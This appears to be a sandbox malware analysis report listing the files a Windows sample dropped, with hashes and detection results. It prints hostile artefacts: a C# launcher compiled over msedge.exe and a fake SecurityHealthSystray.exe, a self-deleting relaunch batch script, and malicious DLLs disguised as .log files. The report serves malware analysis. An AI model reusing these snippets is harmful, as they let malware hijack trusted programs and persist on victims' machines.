                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.0.cs

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.040363848746179
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LSMstiFkD:JNVQIbSfhV7TiFkMSfhWLSMpFkD
                                                          MD5:75A229CEECEB1BC62AFA8F49761BA4AC
                                                          SHA1:7BF75A0477F515A1B8EE824A3A91CFD11EA59798
                                                          SHA-256:1888CF0EA70DDAD9CBB0491B134B2A99F116CF1E8DC08DB1BD51C454DAAB756D
                                                          SHA-512:85D607A1D86F322193D570E9BDAF58E36F8061AFBEE8BB5C3AF66221499618141028975CB615216D4B2D2945054781F6D0AFE6373D3748C467E38971C222F59D
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"); } catch { } }).Start();. }.}.

                                                          C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):251
                                                          Entropy (8bit):5.102860143373494
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fPwvAhyA:Hu7L//TRq79cQyX19
                                                          MD5:6AE68FC91C6C6394BEA0061BAFD2F000
                                                          SHA1:CE5659393ED32BEAD28BBB02A9A7C4C4EF6B21CE
                                                          SHA-256:B335C04803841A8B0B7F35E21AF21DD7411AB73DA9161580E42C1107E29C7107
                                                          SHA-512:0AF3A3C42448741415B6A2C1255C41BA31A5DC26B6DE6B4EFDC3DCFB565B316E2E8C0509C89FEF23A916832C205BE39728E928367A279C11BD967206F718A9AF
                                                          Malicious:false
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.out

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):752
                                                          Entropy (8bit):5.2618667030490975
                                                          Encrypted:false
                                                          SSDEEP:12:KMi/I/u7L//TRq79cQyX14KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79tyX14Kax5DqBVKVrdFAw
                                                          MD5:9C1234B2729AFA9E27676E848DBD9BBA
                                                          SHA1:74AC9B0DF10CE25D73A2D79E04FD6B2CAE5308B7
                                                          SHA-256:03AC9CADE0541D2368780A3CAF5D860EE4006D1D4FDE8EC5CEFBC7BE71020CBB
                                                          SHA-512:6932EB1DCA7C916555ABCBBA08BA629FA872885405FCF59F8B2BA691588E6253295851C5684C4864EEF8B43192151F00E54CFC8F63F4A971C9FD285729BB635C
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):215
                                                          Entropy (8bit):5.178400887698562
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE1NJAc9t8jKOZG1923frh:HTg9uYDEx5P8FF
                                                          MD5:733592B1508E2637AB956E89B7059ACE
                                                          SHA1:7951432BCEC0F2D138670BAE5B2970F501CD7EE1
                                                          SHA-256:6135AE34B33EFBCE390CBBAE2BA2FE88715596E544F4A67E754B0533A586E4DC
                                                          SHA-512:D68481221922BE9D9BDACC50D071D3C31036463058D071CD51D085389C253C9B900C4BC70C785AB29C279BEF685E0EA256049D804488CAFF81F859C5EB1B712B
                                                          Malicious:false
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\9XHFe6y4Dj.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lE7emhVBWP.bat"

                                                          C:\Users\user\AppData\Local\Temp\oZN0JuRYSI

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qfrwB6ToHg

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\qrXWXdvzxq

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.103465189601645
                                                          Encrypted:false
                                                          SSDEEP:3:x2huCQ:x3CQ
                                                          MD5:7F98B6D33C1A046E4DA8DBF71BC1F469
                                                          SHA1:D017C5E2984371AC8E55452EEE7B0AD17B91BD5B
                                                          SHA-256:65E01DACDA64052AC781C19A872BC2B9E423CEA59052E3A45150D8C4B3A328AD
                                                          SHA-512:F882FC2DC32E64D10F7D7C7E339AFD13F5736112F49564D5D081CC5A5C69C39BEC6B1F23C9BB217FDEFCACE2001302F46A79CC93F98B2F3593B316F5FBB018DD
                                                          Malicious:false
                                                          Preview:V99z9b8IKYZNZVgiVSXlcsRpI

                                                          C:\Users\user\AppData\Local\Temp\r6Cbv6Z4W8

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\sbBXIZGApm

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8439810553697228
                                                          Encrypted:false
                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.0.cs

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):425
                                                          Entropy (8bit):5.064035109202258
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LSMstiFkD:JNVQIbSfhWLzIiFkMSfhWLSMpFkD
                                                          MD5:D530B71984B123F5C45E33175621853E
                                                          SHA1:9F197EFBDF876F77A9987F4B1B482C0C6D018BFC
                                                          SHA-256:E5F6E41E949694668C63E0A86BFB8DC9901C184B5914786CD6A2921FE80BAA79
                                                          SHA-512:9AC402E917F4A2F500EED62CEE750091EACF48C3A9C3F54C7625808ACE380F213B011C0ECEA961B0863F9191B824E7903F6E383973A34AE2335A468F5B6818F2
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"); } catch { } }).Start();. }.}.

                                                          C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):266
                                                          Entropy (8bit):5.108542849187747
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fY8bn:Hu7L//TRRzscQyJn
                                                          MD5:290F3C6C8E52A2713B72CA6449AF8E80
                                                          SHA1:A9E9BAEB37145788A8208B862A465C397A378F14
                                                          SHA-256:A75E233216CEAECF4DCEDAB228602EB2421DF4EC347A61BB75BD067D1229FD4C
                                                          SHA-512:CD7F5B0878FEFA934853E31C2012140B34E9DCA91C605806F0A4784946CA4F1E9FAA81B160D7C648A899CC61BC34906C66DC9B594E1857C4791DC0AE1A118F20
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.out

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):767
                                                          Entropy (8bit):5.241559310435716
                                                          Encrypted:false
                                                          SSDEEP:12:KMi/I/u7L//TRRzscQyJuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzstyJuKax5DqBVKVrdFAMb
                                                          MD5:386F6AF968FBBDFBE89ECA167A0800AE
                                                          SHA1:F1E1358E3CEE5CDE701FCC48720E4FDC9DD31FB0
                                                          SHA-256:678F4C94F550AD0356E46A0E6F13947D07DCF338CF07389E6082AE2AF859E90F
                                                          SHA-512:30266F51B08DE641D8DBBBD502B724EE6F87000BCCDD914444312897D19E2CC32E54D5DFEBD0C20F6E6B51DB395432B2545D1D3E823C849EB8D5832213D97915
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\v9vVNIlQ3e

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.243856189774724
                                                          Encrypted:false
                                                          SSDEEP:3:o4BUGvY59n:oGvYjn
                                                          MD5:3020C6550CC6F82C9CDDEAD57E26E7E2
                                                          SHA1:17089D94241ADFE98045F051B53E9B98E60BA891
                                                          SHA-256:3DF91EEB65687CB5B3D392B0F312400F3C203229F6C7A81A177CF5FD208DCCB0
                                                          SHA-512:590E3C5F814F0E56D02BDA72A5448E0788DB513402E533D0F91689CCB87358BEDFA0D4E30743B07530BA79DEEDE6A4AF968AF0F21B30B153083A7FD0750E86FC
                                                          Malicious:false
                                                          Preview:BlCcEQXmmRdTwcJ8IDTRvre9X

                                                          C:\Users\user\AppData\Local\Temp\z7CxztiQUD

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\18d2b5aa6aaeae

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):203
                                                          Entropy (8bit):5.721267403383102
                                                          Encrypted:false
                                                          SSDEEP:6:pt0RBZ8QbTXcXQcFn9rXPVJAv3EAkEnvd:pGRBZ8QPcdlrUEhOvd
                                                          MD5:DA020A76235514A014E9CE7C8BAAF0DE
                                                          SHA1:935831FADD88F5DDCD7A3CE60C51ADA9E9F5993A
                                                          SHA-256:8143DBCFAEAED243E7E023537F91989816E7AB24AEA16E8B69F21DE0BFD6A415
                                                          SHA-512:08DDF3BCE29D19CFC38F71F147150C8259236C091D572709808C54BD897DD2CB31220214D06486D09A6DCC480469FE4B58131C0E391834FBC9B9A6B19F74DCA9
                                                          Malicious:false
                                                          Preview:ueUHONO2hqoTi2jQtd0UQ41CWGWbngEdabaoAocY3YSOpiObm8ePhn50mSuH0xPAmL2Gb5QEAcb2lnXy25yoCy5xgkBs4UhFISlepH9qsZPFLCP846P58k8xPFk13hKq5WtTB3Iv5H6mj0leVCx8FlGiTyOjhIxKOjJzS57BxeA0oVNZeGf0tMkUPL9NojNwUvYAqvLZFwK

                                                          C:\Users\user\Desktop\AKEAUBbV.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Joe Sandbox View:
                                                          • Filename: 12Vjq7Yv2E.exe, Detection: malicious, Browse
                                                          • Filename: 7WyBcig6e3.exe, Detection: malicious, Browse
                                                          • Filename: kBY9lgRaca.exe, Detection: malicious, Browse
                                                          • Filename: lv961v43L3.exe, Detection: malicious, Browse
                                                          • Filename: RRjzYVukzs.exe, Detection: malicious, Browse
                                                          • Filename: FMd6ntIhQY.exe, Detection: malicious, Browse
                                                          • Filename: 5Aw2cV5m0c.exe, Detection: malicious, Browse
                                                          • Filename: AvQTFKdsST.exe, Detection: malicious, Browse
                                                          • Filename: 5WbBcHi91R.exe, Detection: malicious, Browse
                                                          • Filename: ggJWCFp2S3.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\BQsBwRkl.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                          C:\Users\user\Desktop\FcMrvptI.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\GrAQXWWY.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\GzkiCFwe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\HobYtWlT.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\HyVANeDN.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
